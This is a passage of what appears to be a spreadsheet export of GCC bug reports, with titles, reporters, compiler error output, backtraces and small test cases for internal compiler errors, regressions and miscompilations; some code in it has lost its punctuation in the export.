Please include the complete backtrace with any bug report.
See  for instructions.
make[3]: *** [unwind-dw2.o] Error 1
make[3]: Leaving directory `/home/dimhen/build/gcc_current/x86_64-unknown-linux-gnu/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/home/dimhen/build/gcc_current'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/home/dimhen/build/gcc_current'
make: *** [all] Error 2
$ /home/dimhen/build/gcc_current/./gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=/home/dimhen/build/gcc_current/./gcc/xgcc
Target: x86_64-unknown-linux-gnu
Configured with: /home/dimhen/src/gcc_current/configure --enable-checking=fold --disable-multilib
Thread model: posix
gcc version 4.10.0 20140627 (experimental) [trunk revision 212073] (GCC)</t>
  </si>
  <si>
    <t>GCC-67084</t>
  </si>
  <si>
    <t>[c++-concepts] Matching of variable template declarations ignores constraints</t>
  </si>
  <si>
    <t>Created attachment 36102
Test case
The two declarations of p should be distinct due to having different constraints:
template 
constexpr bool p = true
template 
  requires true
constexpr bool p = false
template 
  requires true &amp;&amp; false
constexpr bool p = true
Compiling this program with r226419 results in:
~/concept-gcc/bin/g++ -std=gnu++1z foo.cpp -c
foo.cpp:10:16: error: redefinition of â€˜const bool pâ€™
 constexpr bool p = true
                ^
foo.cpp:6:16: note: â€˜constexpr const bool pâ€™ previously declared here
 constexpr bool p = false
                ^
foo.cpp:10:16: internal compiler error: in set_constraints at cp/pt.c:23421
 constexpr bool p = true
                ^
0x63ae8d set_constraints(tree_node* tree_node*)
	../../gcc/cp/pt.c:23421
0x673e91 process_partial_specialization
	../../gcc/cp/pt.c:4728
0x675467 push_template_decl_real(tree_node* bool)
	../../gcc/cp/pt.c:5250
0x6214c4 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
	../../gcc/cp/decl.c:4919
0x710720 cp_parser_init_declarator
	../../gcc/cp/parser.c:17728
0x7113c4 cp_parser_single_declaration
	../../gcc/cp/parser.c:24892
0x71155b cp_parser_template_declaration_after_parameters
	../../gcc/cp/parser.c:24509
0x712104 cp_parser_explicit_template_declaration
	../../gcc/cp/parser.c:24744
0x712104 cp_parser_template_declaration_after_export
	../../gcc/cp/parser.c:24762
0x718aa9 cp_parser_declaration
	../../gcc/cp/parser.c:11416
0x7170fa cp_parser_declaration_seq_opt
	../../gcc/cp/parser.c:11338
0x717411 cp_parser_translation_unit
	../../gcc/cp/parser.c:4153
0x717411 c_parse_file()
	../../gcc/cp/parser.c:34295
0x85ea22 c_common_parse_file()
	../../gcc/c-family/c-opts.c:1059
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
An equivalent program with class templates or function templates overloaded similarly does compile correctly.</t>
  </si>
  <si>
    <t>GCC-4150</t>
  </si>
  <si>
    <t>catastrophic performance decrease in C++ code</t>
  </si>
  <si>
    <t>On one of my projects a log file analyser gcc 3.0.1 not only
takes twice the time to compile the program compared to gcc
2.95.3 (both times with -O3 -funroll-loops in i686-linux) the
resulting code takes 30 seconds as compared to 4.25 seconds for
the exact same data.  Please find the source code and a test log
file at ftp://foobar.math.fu-berlin.de/pub/fefe/logauswerter/
Release:
3.0.1
Environment:
System: Linux hellhound 2.4.9 #4 Wed Aug 22 00:23:39 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --program-transform-name=s/^/e/ --prefix=/usr --enable-threads --enable-haifa --with-local-prefix=/usr/local
How-To-Repeat:
Compile the logauswerter.C found above with -O3 -funroll-loops
and run it by piping the bunzip2'd log.bz2 in it.</t>
  </si>
  <si>
    <t>leitner</t>
  </si>
  <si>
    <t>GCC-44562</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in get_alias_set at alias.c:716 with -flto -fstrict-aliasing -fgraphite-identity</t>
  </si>
  <si>
    <t>The ICE looks similiar to PR43221 but it may be different issue - this one needs only one file to crash.
Command line:
$ gcc -O1 -flto -fstrict-aliasing -fgraphite-identity testcase.c
Compiler output:
$ gcc -O1 -flto -fstrict-aliasing -fgraphite-identity testcase.c -m32
testcase.c: In function 'foo':
testcase.c:2:6: internal compiler error: in get_alias_set at alias.c:716
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-35722</t>
  </si>
  <si>
    <t>[C++0x] Variadic templates expansion into non-variadic class template</t>
  </si>
  <si>
    <t>The following well-formed example produces the incorrect error:
  error: cannot expand â€˜G ...â€™ into a fixed-length argument list
template
struct foo
{}
template
struct bar : foo
{}
int main() {
  bar f
}</t>
  </si>
  <si>
    <t>GCC-50341</t>
  </si>
  <si>
    <t>calls via function pointer wrongly scheduled giving invalid TOC pointer</t>
  </si>
  <si>
    <t>-mcmodel=medium and -mcmodel=large code containing calls via function pointer may schedule code in the indirect call sequence such that the load of r2 for the indirect call precedes instructions using r2.</t>
  </si>
  <si>
    <t>GCC-58954</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] accessing a private member function in decltype of a friend class causes access control error</t>
  </si>
  <si>
    <t>When trying to use decltype on a member function which has a late specified return type calling a private member function of a friend class I receive the below error.  My understanding is that the friend struct base in derived should cause this error to not occur which is the case with clang.  
Adding foo_argument does cause the error to disappear.  
I apologize for the length of the example but I've had difficulty reproducing it with fewer lines of code.
main.cpp: In instantiation of â€˜struct foo_argumentâ€™:
main.cpp:43:47:   required from here
main.cpp:9:50: error: no matching function for call to â€˜foo_argument::test()â€™
     using type = decltype(test(
                                                  ^
main.cpp:9:50: note: candidate is:
main.cpp:7:16: note: template static Arg foo_argument::test(Ret (C::*)(Arg)) [with Ret = Ret C = C Arg = Arg T = derived]
     static Arg test(Ret (C::*)(Arg))
                ^
main.cpp:7:16: note:   template argument deduction/substitution failed:
main.cpp:35:9: error: â€˜int derived::foo_impl(int)â€™ is private
     int foo_impl(int i)
         ^
main.cpp:9:50: error: within this context
     using type = decltype(test(
The below example can be seen at: http://coliru.stacked-crooked.com/a/3ffd6557434a3ab9
#include 
template
struct foo_argument
{
    template
    static Arg test(Ret (C::*)(Arg))
    using type = decltype(test(
}
template
struct dependent { typedef T type }
template
using Dependent = typename dependent::type
template
struct base
{
    friend struct foo_argument
    template
    auto foo(int i) -&gt; decltype(std::declval&gt;().foo_impl(i))
    {
        return static_cast&lt;T
    }
}
struct derived : base
{
    friend struct base
    //friend struct foo_argument
  private:
    int foo_impl(int i)
    {
        return 123 + i
    }
}
int main()
{
    using foo_arg_type = foo_argument::type
}</t>
  </si>
  <si>
    <t>myspam456</t>
  </si>
  <si>
    <t>GCC-79869</t>
  </si>
  <si>
    <t>i18n: document placeholders for translators</t>
  </si>
  <si>
    <t>from config/arc/arc.c:
error (%s is not available for %s architecture
       DOC arc_selected_cpu-&gt;arch_info-&gt;name)
As a translator I have no idea what the placeholder DOC might contain. Therefore it should be documented above the function call:
/* TRANSLATORS: the first %s looks like mfpu=fpus
   or single precission FPX the second %s looks like ??? */
While here: the first %s should probably be %qs since it can consist of multiple words.</t>
  </si>
  <si>
    <t>GCC-22526</t>
  </si>
  <si>
    <t>vectorizer produces mis-match types in conditionals</t>
  </si>
  <si>
    <t>take following example (compile with -O1 -ftree-vectorize -maltivec):
void a(unsigned long long __n int *__new_start)
{
   for ( __n &gt; 0 --__n ++__new_start)
     *__new_start = 0
}
With the second patch in PR 22368 we get the following error:
pr18425.c: In function 'a':
pr18425.c:2: error: types mismatch in comparsion
long long unsigned intD.6
intD.0
ratio_mult_vf.38D.1726_33 &lt;= 0
pr18425.c:2: error: types mismatch in comparsion
long long unsigned intD.6
intD.0
prolog_loop_niters.34D.1710_16 &lt;= 0
pr18425.c:2: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-28760</t>
  </si>
  <si>
    <t>GC_PTHREAD_CREATE_NAME segfaults in statically linked binaries</t>
  </si>
  <si>
    <t>Compiled java programs that are linked statically with gcj segfault on startup (starting with GCC 4.1.x):
  # gcj -g -static --main=test -Wl--whole-archive -lnss_files_p -lnss_dns_p -lresolv -lpthread -ldl -Wl--no-whole-archive test.java
  # ./a.out
  Segmentation fault
with test.java being i.e.
    public class test {
     public static void main( String args[] ) {
       System.err.println( Hello ) }}
GDB tells me the program is crashing in:
  (gdb) bt
  #0  0x00000000 in ?? ()
  #1  0x081e89de in pthread_create (new_thread=0x86c733c attr=0xbffffa04
    start_routine=0x808fff0  arg=0x74ff8) at ../.././boehm-gc/pthread_support.c:1289
  #2  0x0808fee7 in _Jv_ThreadStart (thread=0x5cb18 data=0x86c7338
    meth=0x808cd30 ) at ../.././libjava/posix-threads.cc:488
  #3  0x0808c702 in java::lang::Thread::start (this=0x5cb18)
    at ../.././libjava/java/lang/natThread.cc:328
  #4  0x080620e4 in _Jv_CreateJavaVM (vm_args=0x0) at ../.././libjava/prims.cc:1334
  #5  0x080622da in _Jv_RunMain (vm_args=0x0 klass=0x8441fc0 name=0x0 argc=1 argv=0xbffffd84
    is_jar=false) at ../.././libjava/prims.cc:1355
  #6  0x08062468 in _Jv_RunMain (klass=0x8441fc0 name=0x0 argc=1 argv=0xbffffd84 is_jar=false)
    at ../.././libjava/prims.cc:1401
  #7  0x0806249b in JvRunMain (klass=0x8441fc0 argc=1 argv=0xbffffd84)
    at ../.././libjava/prims.cc:1407
  #8  0x0804824c in main (argc=Cannot access memory at address 0x1
  ) at /tmp/ccYuSF5L.i:11
Obviously in line 1289 of pthread_support.c GC_PTHREAD_REAL_NAME is null due to  the fact that it is computed using dlvsym() in line 1218. Of course(?) dlvsym() will return null if libpthread is statically linked.
My quick hack around the problem was to just disable the dlvsym() variation (see attached patch). This seems to work for me.
Best regards
Tom</t>
  </si>
  <si>
    <t>aeby</t>
  </si>
  <si>
    <t>GCC-11901</t>
  </si>
  <si>
    <t>[3.3 only] set_fpscr isn't PIC even when __PIC__ defined bad for prelinking causes glibc-3.2.3 check-textrel test to fail</t>
  </si>
  <si>
    <t>set_fpscr contains the line mov.l LOCAL(set_fpscr_L1)r1
which generates non-PIC code.  This causes the glibc-2.3.2
check-textrel regression test to fail and probably gets
in the way of prelinking.  
A patch by Kaz to fix this is at 
http://www.kegel.com/crosstool/current/gcc-3.3-patches/sh-pic-set_fpscr.patch
It seems to fix the problem for me.
Please include this patch in gcc-3.3.2.</t>
  </si>
  <si>
    <t>GCC-67139</t>
  </si>
  <si>
    <t>[concepts] ICE on checking concepts with void with variable template</t>
  </si>
  <si>
    <t>Created attachment 36141
preprocessed source archive
Compile the attached code with -std=gnu++1z. The result is:
../cmcstl2/test/concepts/object.cpp:254:50: internal compiler error: Segmentation fault
 CONCEPT_ASSERT(!models::move_constructible())
                                                  ^
../cmcstl2/test/concepts/object.cpp:254:50: internal compiler error: Aborted
g++: internal compiler error: Aborted (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Cursory attempts to reduce the test case caused the error to go away.</t>
  </si>
  <si>
    <t>GCC-56177</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE when used forward for 'auto f()'</t>
  </si>
  <si>
    <t>Working code:
#include 
//auto f()
auto f() { return 33 }
int main() {
   std::cout &lt;&lt; f() &lt;&lt; std::endl
}
Problematic code:
#include 
auto f()
auto f() { return 33 }
int main() {
   std::cout &lt;&lt; f() &lt;&lt; std::endl
}
Compiler output:
source.cpp: In function 'auto f()':
source.cpp:4:19: internal compiler error: in check_return_expr at cp/typeck.c:8159
auto f() { return 33 }
^
0x5858ac check_return_expr(tree_node* bool*)
../../gcc-4.8-20130127/gcc/cp/typeck.c:8159
0x5a31ae finish_return_stmt(tree_node*)
../../gcc-4.8-20130127/gcc/cp/semantics.c:782
0x55a0d1 cp_parser_jump_statement
../../gcc-4.8-20130127/gcc/cp/parser.c:10041
0x55a0d1 cp_parser_statement
../../gcc-4.8-20130127/gcc/cp/parser.c:8769
0x55a9e6 cp_parser_statement_seq_opt
../../gcc-4.8-20130127/gcc/cp/parser.c:9133
0x55aab6 cp_parser_compound_statement
../../gcc-4.8-20130127/gcc/cp/parser.c:9087
0x56e686 cp_parser_function_body
../../gcc-4.8-20130127/gcc/cp/parser.c:17672
0x56e686 cp_parser_ctor_initializer_opt_and_function_body
../../gcc-4.8-20130127/gcc/cp/parser.c:17708
0x56f6c9 cp_parser_function_definition_after_declarator
../../gcc-4.8-20130127/gcc/cp/parser.c:21680
0x5700f1 cp_parser_function_definition_from_specifiers_and_declarator
../../gcc-4.8-20130127/gcc/cp/parser.c:21601
0x5700f1 cp_parser_init_declarator
../../gcc-4.8-20130127/gcc/cp/parser.c:15810
0x57045a cp_parser_simple_declaration
../../gcc-4.8-20130127/gcc/cp/parser.c:10561
0x5750b7 cp_parser_block_declaration
../../gcc-4.8-20130127/gcc/cp/parser.c:10442
0x5750b7 cp_parser_block_declaration
../../gcc-4.8-20130127/gcc/cp/parser.c:10368
0x57a11b cp_parser_declaration
../../gcc-4.8-20130127/gcc/cp/parser.c:10339
0x578da7 cp_parser_declaration_seq_opt
../../gcc-4.8-20130127/gcc/cp/parser.c:10225
0x57a652 cp_parser_translation_unit
../../gcc-4.8-20130127/gcc/cp/parser.c:3807
0x57a652 c_parse_file()
../../gcc-4.8-20130127/gcc/cp/parser.c:28175
0x612894 c_common_parse_file()
../../gcc-4.8-20130127/gcc/c-family/c-opts.c:1036
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Online test: http://liveworkspace.org/code/3bTktL$0</t>
  </si>
  <si>
    <t>i.nixman</t>
  </si>
  <si>
    <t>GCC-2232</t>
  </si>
  <si>
    <t>Numerous g++ internal errors #122 after trivial omissions of closing brackets/braces/parens</t>
  </si>
  <si>
    <t>Apologies for spartan report.
I regularly get a g++ complete collapse with internal error (122 on this occasion)
which turns out to be provoked by merely omitting the closing
} on a function or other block or in some cases other incomplete
statements eg myfunc(arg1 where I have typed half a line
of code gone away to think come back and compiled.
Completion of the statement or the closing } on a block or
func always fixes the problem.
Previous compilers I have used (not GNU) manage to resync and recover
albeit with usually bogus error messages around the error point.
Do you want detailed reports of these cases ?
Is g++ designed to simply give up at these large error points ?
Happily remaining parsing seems very robust congrats.
Apologies again for spartan error report I am quite happy to
document a case completely if needed.
Greg Edwards
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)
Environment:
HP Kayak PIII 500Mhz RedHat 7.0 C++ code.
How-To-Repeat:
Leave the closing brace off a function in a large code file.
Chop off the last half of a complex statement with lots of
brackets.</t>
  </si>
  <si>
    <t>greg.edwards</t>
  </si>
  <si>
    <t>GCC-58744</t>
  </si>
  <si>
    <t>Illegal Memory Access on 3-byte packed struct ARCH: x86_64</t>
  </si>
  <si>
    <t>Created attachment 31016
Minimum test case. Compile it and look at the assembly.
There is a illegal memory access while trying to access an array of packed struct with 3 unsigned chars as members.
If you have an array of such elems and want to call a function with one of its elems (a copy not a pointer) while copying it to RDI it moves a QWORD instead of just 3 bytes. This could end in an illegal memory access (valgrind detects it). 
Example assembly output (rax is a pointer to the struct elem):
	mov	rdi QWORD PTR [rax]
	call	apply_filter
Attached File:
    The attached file has a minimal test-case tested in multiple gcc versions (described below). It defines a pixel struct and two functions one that receives a pointer to pixel and another that receives a pixel (not a pointer). 
    The function is called for each pixel dereferencing it on the function call. 
How to reproduce:
    Compile file.
    Look at the assembly output before the call to apply_filter
    If it moves more than 3 bytes from [RAX] to RDI it's a bug.
Workaround:
    If you copy the elem to a local variable before the function call and then call apply_filter with that variable it works because the variable is copied byte by byte.
    For example (change line 11 for these two lines):
        k = src[i]
        dst[i] = apply_filter(k)
Related Notes:
    If the struct is of 4 chars instead of 3 it moves a DWORD not a QWORD if the struct is of 5 o 6 it moves a QWORD again. With 2 chars and 1 chars it moves WORD and BYTE respectively.
Compiler Flags: gcc -std=c99 -Wall -Wextra -O0 -c color_filter_c.c -pedantic -o color_filter_bug.asm -S -masm=intel
Architecture: x86_64
Tested this bug in:
gcc (GCC) 4.8.1 20130725 (prerelease)
gcc (Ubuntu/Linaro 4.7.2-2ubuntu1) 4.7.2
gcc (Debian 4.7.2-5) 4.7.2
gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Output of gcc -v (for the latest version):
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.8.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc/src/gcc-4.8-20130725/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --enable-gnu-unique-object --enable-linker-build-id --enable-cloog-backend=isl --disable-cloog-version-check --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-install-libiberty --disable-multilib --disable-libssp --disable-werror --enable-checking=release
Thread model: posix
gcc version 4.8.1 20130725 (prerelease) (GCC)</t>
  </si>
  <si>
    <t>marcovanotti15+gcc</t>
  </si>
  <si>
    <t>GCC-25148</t>
  </si>
  <si>
    <t>compare_values assumes that CST in a + CST (and a - CST) is always postive</t>
  </si>
  <si>
    <t>I am filing this right now even though I don't have a testcase because I am running into it while trying to fix PR 23666.  I don't know if this will cause wrong code or not.  I do know it will cause a missed optimization while compiling g++.dg/tree-ssa/pr18178.C  I have to find a testcase which fails currently.</t>
  </si>
  <si>
    <t>GCC-60642</t>
  </si>
  <si>
    <t>Unclear diagnostic with invalid use of abi_tag attribute on explicit instantiation</t>
  </si>
  <si>
    <t>This seems to not be working again in trunk? (http://gcc.gnu.org/bugzilla/show_bug.cgi?id=55275)
template
class __attribute((abi_tag(foo))) test{  }
template class __attribute((abi_tag(foo))) test
int main() { }
abi_test.cpp:4:46: error: redeclaration of â€˜class testâ€™ adds abi tag foo
 template class __attribute((abi_tag(foo))) test
                                              ^
abi_test.cpp:2:37: note: previous declaration here
 class __attribute((abi_tag(foo))) test{  }</t>
  </si>
  <si>
    <t>lukeallardyce</t>
  </si>
  <si>
    <t>GCC-10322</t>
  </si>
  <si>
    <t>Unified edges of multiple types ICEs...</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; Jan Hubicka  writes:
 &gt; 
 &gt; &gt;&gt; On Wed Mar 26 2003 at 10:27:54AM -0800 Zack Weinberg wrote:
 &gt; &gt;&gt; &gt;         * cfgrtl.c (force_nonfallthru_and_redirect): If e is the edge
 &gt; &gt;&gt; &gt;         we want use it.
 &gt; &gt;&gt; 
 &gt; &gt;&gt; Yes this is ok for 3.3.
 &gt; &gt; I am attaching the fix I sent some time ago.  It fixes the checking
 &gt; &gt; failure as well and fixes force_nonfallthru_and_redirect slightly
 &gt; &gt; differently - it just bypass the code when redirection is noop.  I
 &gt; &gt; beleive it is slightly more safe as still we may have instruction with
 &gt; &gt; multiple outgoing edges where Zacks code would result in misscompilation
 &gt; &gt; (mine would die not much better)
 &gt; 
 &gt; Dying is definitely better than silently miscompiling.  I say go ahead
 &gt; and back out my change and apply yours on both mainline and branch
 &gt; (but don't bother with the test case I already applied it).
 Thanks will do so tomorrow.
 I've been thinking about the problems of this kind - we are missbehaving
 on the multiple edges unified to one in number of places.  I think it
 can happen for the conditional jumps but also to the EH edges so I think
 we should do something about it.
 One problem is definitly that the branch edges do have empty flags so it
 is not possible to recognize these without smart RTL walk (even in RTL
 it is not trivial to realize these).
 Whats about making each edge type to have unique flag - I guess we need
 to add something like EDGE_BRANCH and the rest is safe.  Then we can
 enfore edge redirection to accept flags as an argument and return edge
 so one can redirect the partial edges type by type?
 We probably also should enforce the style where each edge is handled as
 multiedge and individual types are dealt with in sequence instead of
 current style of recognizing the type and behaving accordingly.
 What do you think?
 Honza
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-16882</t>
  </si>
  <si>
    <t>[4.0 Regression] overloading confused by const vector arguments</t>
  </si>
  <si>
    <t>Some of the  functionality no longer works from C++.  I've only
tried it on powerpc-linux but it fails using generic vectors so is probably
target-independent.  This test case shows the problem using generic vectors.
#define vector __attribute__((vector_size(16)))
vector signed int vld (int a1 const vector signed int *a2) { return *a2 }
vector signed short vld (int a1 const vector signed short *a2) { return *a2 }
vector signed char vld (int a1 const vector signed char *a2) { return *a2 }
extern int i
extern vector signed short vss
extern vector signed short *vssp
extern const vector signed short *cvssp
void foo ()
{
  vss = vld(i vssp)
  vss = vld(i cvssp)
}
Output from this test using mainline built last night:
elm3b11% /opt/gcc-nightly/mline-20040804/bin/g++ -c vecld2.C
vecld2.C: In function `void foo()':
vecld2.C:14: error: call of overloaded `vld(int&amp; short int __vector__*&amp;)' is
ambiguous
vecld2.C:3: note: candidates are: int __vector__ vld(int const int __vector__*)
vecld2.C:4: note:                 short int __vector__ vld(int const short int
__vector__*)
vecld2.C:5: note:                 signed char __vector__ vld(int const signed
char __vector__*) 
The test starts failing with the following patch:
2004-07-21  Paolo Bonzini  
        * c-common.c (vector_types_convertible_p): Use vector types'
        TYPE_SIZE and TREE_TYPE instead of their mode.
        * convert.c (convert_to_integer): Likewise.
        (convert_to_vector): Likewise.
        * fold-const.c (fold_convert): Likewise.
        * varasm.c (output_constant): Likewise.
        * expr.c (store_constructor): Split ARRAY_TYPE and VECTOR_TYPE.
        Allow a VECTOR_TYPE initializer to be made of several vectors.
        For ARRAY_TYPEs and VECTOR_TYPES simplify a bit the handling
        of cleared and need_to_clear and use fold_convert.
        * c-typeck.c (build_binary_op): Do not use RDIV_EXPR for
        integer vectors.
cp:
2004-07-21  Paolo Bonzini  
       * typeck.c (build_binary_op): Do not use RDIV_EXPR for
       integer vectors.</t>
  </si>
  <si>
    <t>GCC-21877</t>
  </si>
  <si>
    <t>internal compiler error: in lhd_set_decl_assembler_name at langhooks.c:165</t>
  </si>
  <si>
    <t>Hi!
Well... I've spoted a problem for a couple of weeks now but I don't seem to be 
able to make a nice case from it... I'm sorry I do not know anything about 
compiler developpement and I try to keep a safe distance from C... So here are 
the original sources (minus a lot of thinks which were not necessary)...
I hope it makes sense to someone...
Philippe
PS: I can also send the files as a tarball I just don't know how to...
--------------------------------------------------------------------------------
PPS: my version:
GNU Fortran 95 (GCC 4.1.0 20050517 (experimental))
Copyright (C) 2005 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
--------------------------------------------------------------------------------
PPPS: the error message I get:
MODULE_IO.f90:0: internal compiler error: in lhd_set_decl_assembler_name at 
langhooks.c:165
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
MODULE_SPRACHE.f90: In function ???ctn_error_interception???:
MODULE_SPRACHE.f90:120: internal compiler error: in gfc_conv_variable at 
fortran/trans-expr.c:350
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--------------------------------------------------------------------------------
PPPPS: how to get it:
rm -f *.o *.mod
./gfortran -g -pedantic-errors -Wall -c MODULE_IO.f90
./gfortran -g -pedantic-errors -Wall -c MODULE_SPRACHE.f90
--------------------------------------------------------------------------------
PPPPPS: first file: MODULE_IO.f90:
!======================================================================!
! **********************************************************************
! *                                                                    *
! *                         M O D U L E _ I O                          *
! *                                                                    *
! **********************************************************************
!======================================================================!
!
! Object:
! ======
! Generic subroutines for input/output.
!
!
!======================================================================!
! USER-defines and Parameters
!======================================================================!
!
!
      MODULE MODULE_IO
!
!
! Modules
! =======
!       USE MODULE_DIMENSION ONLY: Length_File_Name
      INTEGER PARAMETER                     ::   Length_File_Name = 250
!
!
!
! Integer
! =======
      INTEGER PARAMETER                     ::   Screen     = 01
!
!
! Character
! =========
      CHARACTER ( LEN = Input_String_Length )::   bufferString
!
!
! Interface for outAusgabe
! ========================
!
      INTERFACE
          SUBROUTINE outAusgabe ( Output String Boolean Intg       &amp;
     &amp;                                             Single Double Fmt )
!               USE MODULE_DIMENSION ONLY: Sng Dbl
              LOGICAL OPTIONAL INTENT ( IN )              ::   Boolean
              INTEGER INTENT ( IN )                        ::   Output
              INTEGER OPTIONAL INTENT ( IN )              ::   Intg
              REAL ( KIND = 4 ) OPTIONAL INTENT ( IN )  ::   Single
              REAL ( KIND = 8 ) OPTIONAL INTENT ( IN )  ::   Double
              CHARACTER ( LEN = * ) OPTIONAL INTENT(IN)   ::   String
              CHARACTER ( LEN = * ) OPTIONAL INTENT(IN)   ::   Fmt
          END SUBROUTINE outAusgabe
      END INTERFACE
!
!
! Generic interface for Ausgabe
! =============================
!
      INTERFACE Ausgabe
!
          MODULE PROCEDURE outString
!
      END INTERFACE Ausgabe
!
!
! Subroutines for generic interface for Eingabe
! =============================================
!
      CONTAINS
!
!
! Subroutines for generic interface for Ausgabe
! =============================================
!
          SUBROUTINE outString ( Unit String Fmt )
!               USE MODULE_DIMENSION ONLY: Sng Dbl
              IMPLICIT NONE
              INTEGER INTENT ( IN )                        ::   Unit
              CHARACTER ( LEN = * ) INTENT ( IN )          ::   String
              CHARACTER ( LEN = * ) OPTIONAL INTENT ( IN )::   Fmt
              IF ( PRESENT ( Fmt ) ) THEN
                  CALL outAusgabe ( Output = Unit String = String    &amp;
     &amp;                                                       Fmt = Fmt )
              ELSE
                  CALL outAusgabe ( Output = Unit String = String )
              ENDIF
          END SUBROUTINE outString
!
!
!======================================================================!
!     End: Module MODULE_IO
!======================================================================!
!
      END MODULE MODULE_IO
!
--------------------------------------------------------------------------------
PPPPPS: first file: MODULE_SPRACHE.f90:
!======================================================================!
! **********************************************************************
! *                                                                    *
! *                    M O D U L E  _ S P R A C H E                    *
! *                                                                    *
! **********************************************************************
!======================================================================!
! Zweck:
! ======
! Fortran90 Module for language settings
!
! Verwaltung:
! ===========
! Angelegt am      05.12.00 Philippe Schaffnit
! Last changes
! 09.02.01   PS    Changes related to V2.2
! 20.01.05   PS    'Message' functions here
!
!======================================================================!
!  Variables-documentation
!======================================================================!
!
! Unit is the number of the unit affected to the messages file
! Path_* is the path to this file (without extension) starting from
!  the directory specified by the user at the beginning of simulation.
!
!======================================================================!
! Declarations
!======================================================================!
!
!
      MODULE MODULE_SPRACHE
!
!
! Modules
! =======
!       USE MODULE_DIMENSION ONLY: Length_File_Name Length_Message
      USE MODULE_IO
      INTEGER PARAMETER                     ::   Length_Message = 250
!
!
! Character
! =========
!
      CHARACTER ( LEN = * ) PARAMETER       ::   New_message =        &amp;
     &amp;                                                      ----------
!
!
!======================================================================!
! Message functions
!======================================================================!
!
      CONTAINS
!
!
!======================================================================!
! Read_Message
!======================================================================!
!
          FUNCTION Read_Message ( Name Unit Message Line )
!
             USE MODULE_IO
             IMPLICIT NONE
             LOGICAL                         ::   Unit_Connected
             INTEGER INTENT ( IN )          ::   Unit Message Line
             INTEGER                         ::   IO_Stat Number k
             CHARACTER ( LEN =Length_Message)::   Read_Message
             CHARACTER ( LEN = * )INTENT(IN)::   Name
             CHARACTER ( LEN =Length_Message)::   Text
!
!            Check if file is connected
!            --------------------------
             INQUIRE ( UNIT = Unit OPENED = Unit_Connected )
             IF ( .NOT. Unit_Connected )                               &amp;
     &amp;           CALL CTN_Error_Interception
!
!            Rewind file
!            -----------
             REWIND ( Unit )
!
!            Find message
!            ------------
             DO
                 READ ( Unit (A) IOSTAT = IO_Stat ) Text
                 IF ( IO_Stat .NE. 0 )                                 &amp;
     &amp;               CALL CTN_Error_Interception
                 IF ( Text(1:10) .EQ. New_message ) THEN
                     READ ( UNIT = Unit FMT = * IOSTAT = IO_Stat )   &amp;
     &amp;                                                            Number
                     IF ( IO_Stat .NE. 0 )                             &amp;
     &amp;                   CALL CTN_Error_Interception
                     IF ( Number .EQ. Message )                        &amp;
     &amp;                   EXIT
                 ENDIF
             ENDDO
!
!            Read line
!            ---------
             DO k = 1 Line
                 READ ( Unit (A) IOSTAT = IO_Stat ) Text
                 IF ( IO_Stat .NE. 0 )                                 &amp;
     &amp;               CALL CTN_Error_Interception
                 IF ( Text(1:10) .EQ. New_message )                    &amp;
     &amp;               CALL CTN_Error_Interception
             ENDDO
!
!            Output
!            ------
             Read_Message = Text
!
!            Error interception
!            ------------------
             CONTAINS
             SUBROUTINE CTN_Error_Interception
!
                 Text =  ERROR IN ROUTINE  // TRIM(Name) // !
                 CALL Ausgabe ( Screen TRIM(Text) // ! (/A) )
                 WRITE ( Text (AI5AI3) )  MESSAGE NOT FOUND:  &amp;
     &amp;                                               Message  - Line
                 CALL Ausgabe ( Screen TRIM(Text) (A/) )
                 Read_Message = Text
                 RETURN
!
             END SUBROUTINE CTN_Error_Interception
!
          END FUNCTION Read_Message
!
!
!======================================================================!
!      End: Module MODULE_SPRACHE
!======================================================================!
!
      END MODULE MODULE_SPRACHE
!</t>
  </si>
  <si>
    <t>P.Schaffnit</t>
  </si>
  <si>
    <t>GCC-58145</t>
  </si>
  <si>
    <t>[Regression]: volatileness of write is discarded perhaps in lim1 related to loop optimizations</t>
  </si>
  <si>
    <t>Created attachment 30640
Preprocessed code compile at -O2 e.g. cc1 -O2 y.i -o y.s
The exact version in which the bug appeared is not yet triaged: it's present on r201675 of trunk r201652 of the 4.8 branch r190527 of the 4.7 branch (!) but appears to not be present in r135713 of the 4.3 branch (!).
